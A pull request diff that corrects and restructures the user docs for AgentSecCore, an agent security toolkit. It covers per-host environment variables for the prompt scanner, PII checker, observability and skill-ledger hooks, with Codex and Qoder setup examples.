### PR TITLE
docs(sec-core): correct and restructure user docs

### DIFF
--- a/docs/user-guide/en/README.md
+++ b/docs/user-guide/en/README.md
@@ -55,6 +55,7 @@ ANOLISA provides a complete server-side runtime for AI Agent workloads. Componen
 |----------|-----------|-------------|
 | [AgentSecCore](agent-security/agent-sec-core/QUICKSTART.md) | agent-sec-core | Hardening, code scanning, prompt scanning, skill ledger |
 | [Code Scanner Hook Configuration](agent-security/agent-sec-core/code-scanner.md) | agent-sec-core | Per-agent hook modes, environment variables, and fallback behavior |
+| [Prompt Scanner](agent-security/agent-sec-core/prompt-scanner.md) | agent-sec-core | Prompt injection / jailbreak detection, modes, and verdicts |
 | [PII Checker](agent-security/agent-sec-core/pii-checker.md) | agent-sec-core | Personal data / credential detection and redaction |
 | [Skill Ledger User Guide](agent-security/agent-sec-core/skill-ledger.md) | agent-sec-core | Skill integrity chain and signing workflow |
 | [OpenClaw Deployment & Upgrade](agent-security/agent-sec-core/openclaw-deploy.md) | agent-sec-core | OpenClaw plugin deployment and upgrade guide |

--- a/docs/user-guide/en/agent-security/agent-sec-core/QUICKSTART.md
+++ b/docs/user-guide/en/agent-security/agent-sec-core/QUICKSTART.md
@@ -131,16 +131,18 @@ Set `PROMPT_SCANNER_HOOK_ENABLED=false` to skip prompt scanner hooks entirely.
 | Environment variable | Default | Hosts that read it | Behavior |
 |----------------------|---------|--------------------|----------|
 | `PROMPT_SCANNER_HOOK_ENABLED` | `true` | All six | Set to `false` to short-circuit the hook before input is read |
-| `PROMPT_SCANNER_MODE` | `observe` | Qoder, Codex, Qwen Code | `observe` audits silently; `warn` warns; `ask`/`block` enforce or fall back to `warn`; `deny` maps to `block` |
+| `PROMPT_SCANNER_MODE` | `observe` | Qoder, Codex, Qwen Code | `observe` audits silently; `deny` blocks prompt-scanner `warn` or `deny` findings. `ask` and `block` are not valid prompt-scanner modes. |
 | `PROMPT_SCANNER_SCAN_MODE` | `standard` | All six | Scan strength: `fast` / `standard` / `strict` |
 | `PROMPT_SCANNER_TIMEOUT` | `10` | Qoder, Codex, Qwen Code | Scanner timeout in seconds |
 
 cosh, Hermes, and OpenClaw do not read `PROMPT_SCANNER_MODE` or
 `PROMPT_SCANNER_TIMEOUT`. On those hosts the prompt policy comes from native
 configuration instead — for OpenClaw that is `promptScanBlock`, while the Hermes
-prompt-scan capability is non-blocking by design and exposes no block switch. See
-[Agent Hook Environment Variables](#agent-hook-environment-variables) for the
-full cross-host matrix.
+prompt-scan capability is non-blocking by design and exposes no block switch. For
+Qoder, Codex, and Qwen Code, use `PROMPT_SCANNER_MODE=deny` to block prompt
+scanner findings; `block` is rejected or treated as an unknown mode by those
+prompt hooks. See [Agent Hook Environment Variables](#agent-hook-environment-variables)
+for the full cross-host matrix.
 
 See the [Prompt Scanner User Guide](prompt-scanner.md) for full CLI options, verdict semantics, and
 Security Event details.
@@ -251,7 +253,7 @@ use only redacted evidence.
 | `PII_CHECKER_MODE` | `observe` | All six | `observe` audits silently; `warn` warns; `ask`/`block` use host-specific enforcement or fallback; `debug` aliases `observe`, and `deny` aliases `block` |
 | `PII_CHECKER_TIMEOUT` | `5` | Qoder, Codex, Qwen Code | Scanner timeout in seconds; Qwen Code caps it at 8 seconds |
 | `PII_CHECKER_INCLUDE_LOW_CONFIDENCE` | `false` | Qoder, Qwen Code | Passes `--include-low-confidence` when enabled |
-| `PII_CHECKER_ENABLED` | - | Qwen Code only | Legacy enabled variable, used when `PII_CHECKER_HOOK_ENABLED` is absent |
+| `PII_CHECKER_ENABLED` | - | Qwen Code only | Legacy enabled variable, used only when `PII_CHECKER_HOOK_ENABLED` is absent |
 
 #### Qwen Code enforcement boundary
 
@@ -540,7 +542,9 @@ policy = "ask"          # observe | warn | ask (default) | block
 
 `timeout` is a required key for every Hermes capability. `prompt-scan-user-input`
 is non-blocking by design: it warns through `transform_llm_output` and has no
-`enable_block` or `policy` field.
+`enable_block` or `policy` field. Its `timeout = 15` value is Hermes capability
+configuration, not `PROMPT_SCANNER_TIMEOUT`; Hermes does not read the prompt
+scanner timeout environment variable.
 
 ### Qwen Code
 
@@ -618,10 +622,12 @@ before enabling it. The registered hooks are:
 | `Stop` | observability |
 
 Codex supports `observe` and `block` for `CODE_SCANNER_MODE`; `ask` is treated as
-unset. Set the policy in the environment that starts Codex:
+unset. Its prompt scanner is separate and accepts only `observe` or `deny`; use
+`PROMPT_SCANNER_MODE=deny` for prompt blocking. Set the policy in the environment
+that starts Codex:
 
 ```bash
-CODE_SCANNER_MODE=block PROMPT_SCANNER_MODE=block PII_CHECKER_MODE=block codex
+CODE_SCANNER_MODE=block PROMPT_SCANNER_MODE=deny PII_CHECKER_MODE=block codex
 ```
 
 ### Qoder
@@ -648,10 +654,12 @@ Skills from `<cwd>/.qoder/skills/`, runs a read-only `skill-ledger check`, and
 applies `SKILL_LEDGER_MODE` (default `ask`). Each check carries Qoder trace
 identifiers into the security audit log.
 
-Qoder supports `observe`, `ask`, and `block` for `CODE_SCANNER_MODE`:
+Qoder supports `observe`, `ask`, and `block` for `CODE_SCANNER_MODE`. Its prompt
+scanner is separate and accepts only `observe` or `deny`; use
+`PROMPT_SCANNER_MODE=deny` for prompt blocking:
 
 ```bash
-CODE_SCANNER_MODE=ask SKILL_LEDGER_MODE=block qoder
+CODE_SCANNER_MODE=ask PROMPT_SCANNER_MODE=deny SKILL_LEDGER_MODE=block qoder
 ```
 
 ### Copilot Shell (cosh)

--- a/docs/user-guide/en/agent-security/agent-sec-core/QUICKSTART.md
+++ b/docs/user-guide/en/agent-security/agent-sec-core/QUICKSTART.md
@@ -428,6 +428,10 @@ adapter code actually reads (✓ = read by that host, ✗ = not read):
 | `SKILL_LEDGER_MODE` | `ask` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
 | `SKILL_LEDGER_TIMEOUT` | `5` | ✗ | ✓ | ✓ | ✗ | ✗ | ✗ |
 | `OBSERVABILITY_HOOK_ENABLED` | `true` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
+| `OBSERVABILITY_TIMEOUT` | `5` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
+
+`OBSERVABILITY_TIMEOUT` uses `5` seconds when unset, empty, invalid, or non-positive;
+values above `5` are capped at `5` by every integration.
 
 Where a variable is not read by a host, that host's native configuration governs
 the behavior. For example OpenClaw takes its prompt policy from
@@ -688,7 +692,9 @@ A: `agent-sec-cli harden` is the ANOLISA unified entry point that wraps `loongsh
 
 **Q: How do I update the ML model for prompt scanning?**
 
-A: Run `agent-sec-cli scan-prompt warmup` again. It downloads the latest model from ModelScope.
+A: Run `ollama pull modelscope.cn/ANOLISA/Qwen3Guard-Gen-0.6B-GGUF` to fetch the
+current model, then run `agent-sec-cli scan-prompt warmup` to verify that Ollama
+can serve it. `warmup` never downloads models automatically.
 
 **Q: What does Skill Ledger `tampered` mean?**
 

--- a/docs/user-guide/en/agent-security/agent-sec-core/QUICKSTART.md
+++ b/docs/user-guide/en/agent-security/agent-sec-core/QUICKSTART.md
@@ -307,9 +307,10 @@ restart the host after changing it. The variable accepts only `true` / `false`
 recording enabled.
 
 `OBSERVABILITY_TIMEOUT` sets the timeout in seconds for each local PII
-redaction and observability record CLI call. It defaults to `5`; an unset,
-empty, invalid, or non-positive value also uses `5`. Every integration caps
-larger values at `5`.
+redaction and observability record CLI call. The five non-Hermes integrations
+default to `5`; an unset, empty, invalid, or non-positive value also uses `5`.
+Hermes instead falls back to its observability capability `timeout`, bounded to
+at most `5`. Every integration caps a valid environment value above `5` at `5`.
 
 For OpenClaw and Hermes, the existing observability capability `enabled` setting
 is an independent gate. Either switch can disable recording;
@@ -430,8 +431,11 @@ adapter code actually reads (✓ = read by that host, ✗ = not read):
 | `OBSERVABILITY_HOOK_ENABLED` | `true` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
 | `OBSERVABILITY_TIMEOUT` | `5` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
 
-`OBSERVABILITY_TIMEOUT` uses `5` seconds when unset, empty, invalid, or non-positive;
-values above `5` are capped at `5` by every integration.
+The matrix default is `5`, matching the five non-Hermes integrations and the
+bundled Hermes configuration. For Hermes, an unset, empty, invalid, or
+non-positive `OBSERVABILITY_TIMEOUT` falls back to the observability capability
+`timeout`, bounded to at most `5`; a lower configured value therefore remains
+effective. Every integration caps a valid environment value above `5` at `5`.
 
 Where a variable is not read by a host, that host's native configuration governs
 the behavior. For example OpenClaw takes its prompt policy from

--- a/docs/user-guide/en/agent-security/agent-sec-core/QUICKSTART.md
+++ b/docs/user-guide/en/agent-security/agent-sec-core/QUICKSTART.md
@@ -1,5 +1,7 @@
 # AgentSecCore
 
+[中文版](../../../zh/agent-security/agent-sec-core/QUICKSTART.md)
+
 AgentSecCore is an all-local security kernel for AI Agents. It runs entirely on the local machine with zero Token consumption, providing defense-in-depth: prompt injection detection, code scanning, skill integrity verification, PII detection, system hardening, and sandbox isolation.
 
 ## Overview
@@ -124,15 +126,21 @@ Model source: L2 uses `modelscope.cn/ANOLISA/Qwen3Guard-Gen-0.6B-GGUF`, served b
 
 #### Host hook policy
 
-Set `PROMPT_SCANNER_HOOK_ENABLED=false` to skip prompt scanner hooks entirely. When enabled, the
-following variables override capability configuration:
+Set `PROMPT_SCANNER_HOOK_ENABLED=false` to skip prompt scanner hooks entirely.
 
-| Environment variable | Default | Behavior |
-|----------------------|---------|----------|
-| `PROMPT_SCANNER_HOOK_ENABLED` | `true` | Set to `false` to short-circuit the hook before input is read |
-| `PROMPT_SCANNER_MODE` | `observe` | `observe` audits silently; `warn` warns; `ask`/`block` enforce or fall back to `warn`; `deny` maps to `block` |
-| `PROMPT_SCANNER_SCAN_MODE` | `standard` | Scan strength: `fast` / `standard` / `strict` |
-| `PROMPT_SCANNER_TIMEOUT` | `10` | Scanner timeout in seconds |
+| Environment variable | Default | Hosts that read it | Behavior |
+|----------------------|---------|--------------------|----------|
+| `PROMPT_SCANNER_HOOK_ENABLED` | `true` | All six | Set to `false` to short-circuit the hook before input is read |
+| `PROMPT_SCANNER_MODE` | `observe` | Qoder, Codex, Qwen Code | `observe` audits silently; `warn` warns; `ask`/`block` enforce or fall back to `warn`; `deny` maps to `block` |
+| `PROMPT_SCANNER_SCAN_MODE` | `standard` | All six | Scan strength: `fast` / `standard` / `strict` |
+| `PROMPT_SCANNER_TIMEOUT` | `10` | Qoder, Codex, Qwen Code | Scanner timeout in seconds |
+
+cosh, Hermes, and OpenClaw do not read `PROMPT_SCANNER_MODE` or
+`PROMPT_SCANNER_TIMEOUT`. On those hosts the prompt policy comes from native
+configuration instead — for OpenClaw that is `promptScanBlock`, while the Hermes
+prompt-scan capability is non-blocking by design and exposes no block switch. See
+[Agent Hook Environment Variables](#agent-hook-environment-variables) for the
+full cross-host matrix.
 
 See the [Prompt Scanner User Guide](prompt-scanner.md) for full CLI options, verdict semantics, and
 Security Event details.
@@ -173,6 +181,9 @@ OS-level skill integrity tracking with Ed25519 signatures and append-only versio
 # Initialize keys and baseline scan
 agent-sec-cli skill-ledger init
 
+# Read-only content analysis, without creating or updating ledger state
+agent-sec-cli skill-ledger analyze /path/to/skill --format json
+
 # Check integrity (no modification)
 agent-sec-cli skill-ledger check /path/to/skill
 agent-sec-cli skill-ledger check --all
@@ -205,6 +216,8 @@ agent-sec-cli skill-ledger show /path/to/skill
 agent-sec-cli skill-ledger export /path/to/skill --output /tmp/export/
 ```
 
+Signing keys live under `~/.local/share/agent-sec/skill-ledger/`.
+
 ### PII Checker
 
 Detects personal information and credentials in text input.
@@ -226,26 +239,30 @@ agent-sec-cli scan-pii --text "card 4111111111111111" --redact-output
 agent-sec-cli scan-pii --text "some text" --include-low-confidence
 ```
 
-#### Qwen Code integration
+#### Host hook policy
+
+All six hosts scan with the PII checker. It runs in observe-only, fail-open mode by
+default; raw scan content is passed to `scan-pii` only through stdin, and notices
+use only redacted evidence.
+
+| Environment variable | Default | Hosts that read it | Behavior |
+|----------------------|---------|--------------------|----------|
+| `PII_CHECKER_HOOK_ENABLED` | `true` | All six | Set to `false` to skip the PII hook before input is read |
+| `PII_CHECKER_MODE` | `observe` | All six | `observe` audits silently; `warn` warns; `ask`/`block` use host-specific enforcement or fallback; `debug` aliases `observe`, and `deny` aliases `block` |
+| `PII_CHECKER_TIMEOUT` | `5` | Qoder, Codex, Qwen Code | Scanner timeout in seconds; Qwen Code caps it at 8 seconds |
+| `PII_CHECKER_INCLUDE_LOW_CONFIDENCE` | `false` | Qoder, Qwen Code | Passes `--include-low-confidence` when enabled |
+| `PII_CHECKER_ENABLED` | - | Qwen Code only | Legacy enabled variable, used when `PII_CHECKER_HOOK_ENABLED` is absent |
+
+#### Qwen Code enforcement boundary
 
 The Qwen Code extension scans user prompts, tool inputs, successful and failed tool
-outputs, and final model output. It is enabled in observe-only, fail-open mode by
-default; raw scan content is passed to `scan-pii` only through stdin, and notices use
-only redacted evidence.
+outputs, and final model output.
 
 ```bash
 # Enable the extension, then start Qwen Code with blocking enabled
 anolisa adapter enable sec-core qwencode
 PII_CHECKER_MODE=block qwen
 ```
-
-| Environment variable | Default | Behavior |
-|----------------------|---------|----------|
-| `PII_CHECKER_HOOK_ENABLED` | `true` | Set to `false` to skip the PII hook before input is read |
-| `PII_CHECKER_MODE` | `observe` | `observe` audits silently; `warn` warns; `ask`/`block` use host-specific enforcement or fallback; `debug` aliases `observe`, and `deny` aliases `block` |
-| `PII_CHECKER_ENABLED` | - | Legacy Qwen-only enabled variable, used when the new switch is absent |
-| `PII_CHECKER_INCLUDE_LOW_CONFIDENCE` | `false` | Passes `--include-low-confidence` when enabled |
-| `PII_CHECKER_TIMEOUT` | `5` | Scanner timeout in seconds, capped at 8 seconds |
 
 User prompts and tool inputs can be stopped before execution. For a successful tool call,
 `PostToolUse` runs after side effects have occurred, but Qwen Code 0.19.9 consumes
@@ -281,11 +298,11 @@ agent-sec-cli harden --downstream-help
 
 Interactive event review tool for auditing Agent behavior.
 
-The OpenClaw, Hermes, cosh, Qwen Code, Qoder, and Codex integrations enable
-their observability hooks by default. To disable hook recording, set
-`OBSERVABILITY_HOOK_ENABLED=false` before starting the host and restart the host
-after changing it. The variable accepts only `true` / `false` (ignoring case and
-surrounding whitespace); an unset or invalid value keeps recording enabled.
+All six integrations enable their observability hooks by default. To disable hook
+recording, set `OBSERVABILITY_HOOK_ENABLED=false` before starting the host and
+restart the host after changing it. The variable accepts only `true` / `false`
+(ignoring case and surrounding whitespace); an unset or invalid value keeps
+recording enabled.
 
 `OBSERVABILITY_TIMEOUT` sets the timeout in seconds for each local PII
 redaction and observability record CLI call. It defaults to `5`; an unset,
@@ -378,6 +395,53 @@ View source and limits:
 - Not included: OpenClaw, Hermes, or other Agent configuration files; Agent home directories; live hook loading or registration state.
 - Known drift: running the command from a different shell/container/service or with different Agent config can produce output that differs from real Agent runtime behavior.
 
+## Agent Hook Environment Variables
+
+Every host reads `<CAPABILITY>_HOOK_ENABLED` (`true` / `false`, case-insensitive,
+surrounding whitespace ignored). An unset or invalid value keeps the hook
+enabled. For capabilities that use the shared hook policy parser,
+`<CAPABILITY>_MODE` selects how findings are surfaced; `debug` is an alias for
+`observe` and `deny` is an alias for `block`. Prompt Scanner is narrower:
+`PROMPT_SCANNER_MODE` accepts only `observe` and `deny`. Hosts read these
+variables when they load the plugin, so restart the host after changing them.
+
+**Not every variable is honored by every host.** This table reflects what the
+adapter code actually reads (✓ = read by that host, ✗ = not read):
+
+| Variable | Default | cosh | Qoder | Codex | Qwen Code | Hermes | OpenClaw |
+|----------|---------|------|-------|-------|-----------|--------|----------|
+| `CODE_SCANNER_HOOK_ENABLED` | `true` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
+| `CODE_SCANNER_MODE` | `observe` (cosh: `ask`) | ✓ (only `ask`) | ✓ | ✓ | ✓ | ✓ | ✓ |
+| `CODE_SCANNER_TIMEOUT` | `10` | ✗ | ✓ | ✓ | ✓ | ✗ | ✗ |
+| `PROMPT_SCANNER_HOOK_ENABLED` | `true` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
+| `PROMPT_SCANNER_MODE` | `observe` | ✗ | ✓ | ✓ | ✓ | ✗ | ✗ |
+| `PROMPT_SCANNER_SCAN_MODE` | `standard` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
+| `PROMPT_SCANNER_TIMEOUT` | `10` | ✗ | ✓ | ✓ | ✓ | ✗ | ✗ |
+| `PII_CHECKER_HOOK_ENABLED` | `true` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
+| `PII_CHECKER_MODE` | `observe` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
+| `PII_CHECKER_TIMEOUT` | `5` | ✗ | ✓ | ✓ | ✓ | ✗ | ✗ |
+| `PII_CHECKER_INCLUDE_LOW_CONFIDENCE` | `false` | ✗ | ✓ | ✗ | ✓ | ✗ | ✗ |
+| `PII_CHECKER_ENABLED` (legacy) | — | ✗ | ✗ | ✗ | ✓ | ✗ | ✗ |
+| `SKILL_LEDGER_HOOK_ENABLED` | `true` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
+| `SKILL_LEDGER_MODE` | `ask` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
+| `SKILL_LEDGER_TIMEOUT` | `5` | ✗ | ✓ | ✓ | ✗ | ✗ | ✗ |
+| `OBSERVABILITY_HOOK_ENABLED` | `true` | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ |
+
+Where a variable is not read by a host, that host's native configuration governs
+the behavior. For example OpenClaw takes its prompt policy from
+`promptScanBlock` and its code-scan policy from `codeScanRequireApproval`, while
+Hermes uses `enable_block` for `code-scan` and `policy` for `pii-scan-user-input`.
+The Hermes `prompt-scan-user-input` capability has no block switch at all.
+
+For Hermes and OpenClaw, the capability `enabled` setting remains an independent
+gate. Either switch can disable a hook; setting `<CAPABILITY>_HOOK_ENABLED=true`
+does not re-enable a capability that plugin configuration has disabled.
+`PII_CHECKER_ENABLED` is a Qwen Code legacy fallback only: Qwen Code reads it
+only when `PII_CHECKER_HOOK_ENABLED` is absent, and all other hosts ignore it.
+
+Per-host Code Scanner mode semantics and fallback behavior:
+[Code Scanner Hook Configuration](code-scanner.md).
+
 ## Agent Framework Integration
 
 For an ANOLISA-managed raw package or an adopted RPM, installation places the
@@ -455,17 +519,28 @@ enable_block = false    # false=observe, true=block
 [capabilities.pii-scan-user-input]
 enabled = true
 timeout = 10
+policy = "observe"      # observe (default) | warn | ask | block
+include_low_confidence = false
+warning_ttl_seconds = 300
 
 [capabilities.prompt-scan-user-input]
 enabled = true
-timeout = 10
-enable_block = false    # false=observe, true=block
+timeout = 15
+warning_ttl_seconds = 300
+
+[capabilities.observability]
+enabled = true
+timeout = 5
 
 [capabilities.skill-ledger]
 enabled = true
 timeout = 5
 policy = "ask"          # observe | warn | ask (default) | block
 ```
+
+`timeout` is a required key for every Hermes capability. `prompt-scan-user-input`
+is non-blocking by design: it warns through `transform_llm_output` and has no
+`enable_block` or `policy` field.
 
 ### Qwen Code
 
@@ -522,6 +597,62 @@ symlinks whose targets leave the corresponding `.qwen/skills` root. Missing CLI
 or keys, initialization failure, inaccessible or ambiguous paths or settings,
 timeouts, and invalid output are diagnosed and fail open. There is no startup
 preflight, background scan, cache, or automatic configuration repair.
+
+### Codex
+
+Enable the adapter with ANOLISA:
+
+```bash
+anolisa adapter enable sec-core codex
+```
+
+The adapter registers `agent-sec-core` as a Codex plugin through the bundled
+`agent-sec` marketplace, so `codex` and `agent-sec-cli` must both be on `PATH`
+before enabling it. The registered hooks are:
+
+| Codex hook | Checks |
+|------------|--------|
+| `UserPromptSubmit` | prompt scanner, PII checker, Skill Ledger, observability |
+| `PreToolUse` | code scanner (`Bash` matcher), PII checker, observability |
+| `PostToolUse` | PII checker, observability |
+| `Stop` | observability |
+
+Codex supports `observe` and `block` for `CODE_SCANNER_MODE`; `ask` is treated as
+unset. Set the policy in the environment that starts Codex:
+
+```bash
+CODE_SCANNER_MODE=block PROMPT_SCANNER_MODE=block PII_CHECKER_MODE=block codex
+```
+
+### Qoder
+
+Enable the adapter with ANOLISA:
+
+```bash
+anolisa adapter enable sec-core qoder
+```
+
+The adapter installs a Qoder CLI plugin via `qodercli plugins install`. Restart
+Qoder CLI or run `/plugins reload` afterwards. The registered hooks are:
+
+| Qoder hook | Checks |
+|------------|--------|
+| `UserPromptSubmit` | observability, PII checker, prompt scanner |
+| `PreToolUse` | observability, Skill Ledger (`Skill` matcher), code scanner (`Bash` matcher), PII checker |
+| `PostToolUse` | observability, PII checker |
+| `PostToolUseFailure` | observability |
+| `Stop` / `StopFailure` | observability |
+
+The Skill Ledger hook resolves user Skills from `~/.qoder/skills/` before project
+Skills from `<cwd>/.qoder/skills/`, runs a read-only `skill-ledger check`, and
+applies `SKILL_LEDGER_MODE` (default `ask`). Each check carries Qoder trace
+identifiers into the security audit log.
+
+Qoder supports `observe`, `ask`, and `block` for `CODE_SCANNER_MODE`:
+
+```bash
+CODE_SCANNER_MODE=ask SKILL_LEDGER_MODE=block qoder
+```
 
 ### Copilot Shell (cosh)
 

--- a/docs/user-guide/en/agent-security/agent-sec-core/openclaw-deploy.md
+++ b/docs/user-guide/en/agent-security/agent-sec-core/openclaw-deploy.md
@@ -163,15 +163,18 @@ Enable prompt blocking:
 openclaw config set plugins.entries.agent-sec.config.promptScanBlock true
 ```
 
-You can also override prompt scanner behavior at deployment time with environment variables. These
-take precedence over the OpenClaw capability configuration:
+You can also influence prompt scanner behavior at deployment time with these environment
+variables. `PROMPT_SCANNER_HOOK_ENABLED=false` skips hook registration regardless of plugin
+configuration:
 
 | Environment variable | Default | Behavior |
 |----------------------|---------|----------|
 | `PROMPT_SCANNER_HOOK_ENABLED` | `true` | Set to `false` to skip prompt-scan hook registration entirely |
-| `PROMPT_SCANNER_MODE` | `observe` | Policy mode: `observe` / `warn` / `ask` / `block`; `deny` maps to `block` |
 | `PROMPT_SCANNER_SCAN_MODE` | `standard` | Scan strength passed to `scan-prompt`: `fast` / `standard` / `strict` |
-| `PROMPT_SCANNER_TIMEOUT` | `10` | Scanner timeout in seconds |
+
+The OpenClaw plugin does not read `PROMPT_SCANNER_MODE` or `PROMPT_SCANNER_TIMEOUT`. The prompt
+policy on OpenClaw is governed by `promptScanBlock` above, and the scanner timeout is fixed at
+10 seconds.
 
 Restart the OpenClaw gateway after changing these variables.
 

--- a/docs/user-guide/en/agent-security/agent-sec-core/pii-checker.md
+++ b/docs/user-guide/en/agent-security/agent-sec-core/pii-checker.md
@@ -91,10 +91,10 @@ variables are only read by some of them:
 | `PII_CHECKER_TIMEOUT` | `5` | Qoder, Codex, Qwen Code (Qwen Code caps it at 8 seconds) |
 | `PII_CHECKER_INCLUDE_LOW_CONFIDENCE` | `false` | Qoder, Qwen Code |
 
-cosh, Hermes, and OpenClaw do not read those two environment variables. Hermes and OpenClaw
-still support both settings through capability configuration instead — `timeout` and
-`include_low_confidence` for Hermes, `piiIncludeLowConfidence` for OpenClaw — while cosh uses a
-fixed timeout and never requests low-confidence findings.
+cosh, Hermes, and OpenClaw do not read those two environment variables. Hermes supports both
+settings through capability configuration (`timeout` and `include_low_confidence`). OpenClaw
+supports only `piiIncludeLowConfidence`; its PII scanner CLI timeout is fixed at 10 seconds.
+cosh uses a fixed timeout and never requests low-confidence findings.
 
 The host Agent reads these variables when it loads the plugin. Restart the Agent process that
 hosts the hook after changing them; the hook and agent-sec-core are not separate policy services.

--- a/docs/user-guide/en/agent-security/agent-sec-core/pii-checker.md
+++ b/docs/user-guide/en/agent-security/agent-sec-core/pii-checker.md
@@ -83,6 +83,19 @@ policy overrides Hermes/OpenClaw capability configuration. `debug` maps to `obse
 `deny` maps to `block`. Qwen Code additionally accepts the legacy `PII_CHECKER_ENABLED` switch when
 `PII_CHECKER_HOOK_ENABLED` is absent.
 
+`PII_CHECKER_HOOK_ENABLED` and `PII_CHECKER_MODE` are read by all six hosts. Two further
+variables are only read by some of them:
+
+| Environment variable | Default | Hosts that read it |
+|----------------------|---------|--------------------|
+| `PII_CHECKER_TIMEOUT` | `5` | Qoder, Codex, Qwen Code (Qwen Code caps it at 8 seconds) |
+| `PII_CHECKER_INCLUDE_LOW_CONFIDENCE` | `false` | Qoder, Qwen Code |
+
+cosh, Hermes, and OpenClaw do not read those two environment variables. Hermes and OpenClaw
+still support both settings through capability configuration instead — `timeout` and
+`include_low_confidence` for Hermes, `piiIncludeLowConfidence` for OpenClaw — while cosh uses a
+fixed timeout and never requests low-confidence findings.
+
 The host Agent reads these variables when it loads the plugin. Restart the Agent process that
 hosts the hook after changing them; the hook and agent-sec-core are not separate policy services.
 

--- a/docs/user-guide/en/agent-security/agent-sec-core/prompt-scanner.md
+++ b/docs/user-guide/en/agent-security/agent-sec-core/prompt-scanner.md
@@ -66,7 +66,7 @@ the following environment variables control deployment-level behavior:
 | Environment variable | Default | Hosts that read it | Behavior |
 |----------------------|---------|--------------------|----------|
 | `PROMPT_SCANNER_HOOK_ENABLED` | `true` | All six | Set to `false` to short-circuit the hook before input is read |
-| `PROMPT_SCANNER_MODE` | `observe` | Qoder, Codex, Qwen Code | `observe` audits silently; `warn` warns; `ask`/`block` use host-specific enforcement or fall back to `warn`; `deny` maps to `block` |
+| `PROMPT_SCANNER_MODE` | `observe` | Qoder, Codex, Qwen Code | `observe` audits silently; `deny` blocks prompt-scanner `warn` or `deny` findings. `ask` and `block` are not valid prompt-scanner modes. |
 | `PROMPT_SCANNER_SCAN_MODE` | `standard` | All six | Scan strength passed to `scan-prompt`: `fast` / `standard` / `strict` |
 | `PROMPT_SCANNER_TIMEOUT` | `10` | Qoder, Codex, Qwen Code | Scanner timeout in seconds |
 
@@ -74,14 +74,16 @@ cosh, Hermes, and OpenClaw read only `PROMPT_SCANNER_HOOK_ENABLED` and
 `PROMPT_SCANNER_SCAN_MODE`. Setting `PROMPT_SCANNER_MODE` or `PROMPT_SCANNER_TIMEOUT` has no
 effect there. OpenClaw derives its enforcement from `promptScanBlock` and uses a fixed
 10-second scanner timeout, while the Hermes `prompt-scan-user-input` capability is non-blocking
-by design and has no block switch; cosh has no prompt policy switch either.
+by design and has no block switch; cosh has no prompt policy switch either. For Qoder, Codex,
+and Qwen Code, use `PROMPT_SCANNER_MODE=deny` to block prompt scanner findings.
 
-Where an environment variable is read, it overrides the matching Hermes/OpenClaw capability
-configuration. The host Agent reads these variables when it loads the plugin, so restart the
-Agent process after changing them.
+Where an environment variable is read, it overrides the matching host configuration.
+The host Agent reads these variables when it loads the plugin, so restart the Agent process
+after changing them.
 
-Scanner verdict `deny` describes the risk severity; hook policy `block` controls whether the current
-adapter attempts enforcement.
+Scanner verdict `deny` describes risk severity. For Qoder, Codex, and Qwen Code prompt hooks,
+`PROMPT_SCANNER_MODE=deny` is the deployment policy that turns prompt-scanner findings into a
+blocking hook result.
 
 ## Security Events and Observability
 

--- a/docs/user-guide/en/agent-security/agent-sec-core/prompt-scanner.md
+++ b/docs/user-guide/en/agent-security/agent-sec-core/prompt-scanner.md
@@ -63,15 +63,22 @@ The scanner aggregates layer results into one verdict:
 Set `PROMPT_SCANNER_HOOK_ENABLED=false` to skip host prompt scanner hooks entirely. When enabled,
 the following environment variables control deployment-level behavior:
 
-| Environment variable | Default | Behavior |
-|----------------------|---------|----------|
-| `PROMPT_SCANNER_HOOK_ENABLED` | `true` | Set to `false` to short-circuit the hook before input is read |
-| `PROMPT_SCANNER_MODE` | `observe` | `observe` audits silently; `warn` warns; `ask`/`block` use host-specific enforcement or fall back to `warn`; `deny` maps to `block` |
-| `PROMPT_SCANNER_SCAN_MODE` | `standard` | Scan strength passed to `scan-prompt`: `fast` / `standard` / `strict` |
-| `PROMPT_SCANNER_TIMEOUT` | `10` | Scanner timeout in seconds |
+| Environment variable | Default | Hosts that read it | Behavior |
+|----------------------|---------|--------------------|----------|
+| `PROMPT_SCANNER_HOOK_ENABLED` | `true` | All six | Set to `false` to short-circuit the hook before input is read |
+| `PROMPT_SCANNER_MODE` | `observe` | Qoder, Codex, Qwen Code | `observe` audits silently; `warn` warns; `ask`/`block` use host-specific enforcement or fall back to `warn`; `deny` maps to `block` |
+| `PROMPT_SCANNER_SCAN_MODE` | `standard` | All six | Scan strength passed to `scan-prompt`: `fast` / `standard` / `strict` |
+| `PROMPT_SCANNER_TIMEOUT` | `10` | Qoder, Codex, Qwen Code | Scanner timeout in seconds |
 
-Environment variables override Hermes/OpenClaw capability configuration. The host Agent reads them
-when it loads the plugin, so restart the Agent process after changing them.
+cosh, Hermes, and OpenClaw read only `PROMPT_SCANNER_HOOK_ENABLED` and
+`PROMPT_SCANNER_SCAN_MODE`. Setting `PROMPT_SCANNER_MODE` or `PROMPT_SCANNER_TIMEOUT` has no
+effect there. OpenClaw derives its enforcement from `promptScanBlock` and uses a fixed
+10-second scanner timeout, while the Hermes `prompt-scan-user-input` capability is non-blocking
+by design and has no block switch; cosh has no prompt policy switch either.
+
+Where an environment variable is read, it overrides the matching Hermes/OpenClaw capability
+configuration. The host Agent reads these variables when it loads the plugin, so restart the
+Agent process after changing them.
 
 Scanner verdict `deny` describes the risk severity; hook policy `block` controls whether the current
 adapter attempts enforcement.

--- a/docs/user-guide/zh/README.md
+++ b/docs/user-guide/zh/README.md
@@ -55,6 +55,7 @@ ANOLISA 为 AI Agent 提供完整的服务端运行时能力。通过 `anolisa` 
 |------|------|------|
 | [AgentSecCore](agent-security/agent-sec-core/QUICKSTART.md) | agent-sec-core | 系统加固、代码扫描、提示词扫描、技能账本 |
